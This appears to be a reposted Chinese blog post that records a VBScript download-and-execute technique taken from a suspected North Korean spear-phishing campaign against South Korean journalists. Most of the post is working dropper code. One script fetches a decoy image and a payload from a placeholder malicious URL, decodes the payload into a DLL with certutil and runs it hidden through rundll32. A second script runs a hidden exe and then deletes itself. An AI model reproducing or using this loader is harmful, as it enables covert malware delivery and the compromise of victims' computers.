zoukankan html css js c++ java

利用VBS下载EXE文件手法记录

1、信息来源

疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

https://twitter.com/blackorbird/status/1082553543280680962

2、利用思路

1、下载http://恶意网址/note[.]png作为文件到%temp%路径下，通过【powershell Invoke-item】运行。
2、下载http://恶意网址/svchow.dat改名为svchow[.]dat
3、 certutil -f –decode 强制覆盖文件、base64解码改名为dll
4、通过powershell运行rundl32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。

3、实例代码

下载代码：

Set wshShell = CreateObject("Wscript.shell")
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "
ote.png"
with bStrm
	.type = 1 '//binary
	.open
	.write xHttp.responseBody
	.savetofile docPath, 2 '//overwrite
end With

CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "
ote.png'", 0, true

docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send

with bStrm2
	.type = 1 '//binary
	.open
	.write xHttp2.responseBody
	.savetofile dir + "svchow.dat", 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "svchow.dat, " & dir & "svchow.dll",0,true
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "svchow.dll,MyRTLCreateFunction",0,true

转码运行exe：

Dim fIn, fOut, sFilename, sBOM
sFilename = "C:windows	empxxx.exe"

Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename

sBOM = fIn.Read(5)
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
If AscB(MidB(sBOM, 1, 1)) = 255 _
        And AscB(MidB(sBOM, 2, 1)) = 254 Then
    
    fIn.Position = 2 ' Skip BOM

    Set fOut = CreateObject("adodb.stream")
    fOut.Type = 1 'adTypeBinary
    fOut.Mode = adModeReadWrite
    fOut.Open

    fIn.CopyTo fOut

    fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
    fOut.Flush
    fOut.Close

	Set shell = CreateObject("Wscript.Shell")
	shell.Run "c:windows	empxxx.exe",0,False
	
	Set fso = CreateObject("Scripting.FileSystemObject") 
	fso.DeleteFile(WScript.ScriptName) 
End If

查看全文

相关阅读:
java中的 equals 与 ==
String类的内存分配
 SVN用命令行更换本地副本IP地址
 npoi 设置单元格格式
 net core 微服务框架 Viper 调用链路追踪
 打不死的小强 .net core 微服务快速开发框架 Viper 限流
 net core 微服务快速开发框架 Viper 初体验20201017
Anno 框架增加缓存、限流策略、事件总线、支持 thrift grpc 作为底层传输
 net core 微服务快速开发框架
 Viper 微服务框架编写一个hello world 插件02

原文地址：https://www.cnblogs.com/17bdw/p/10181580.html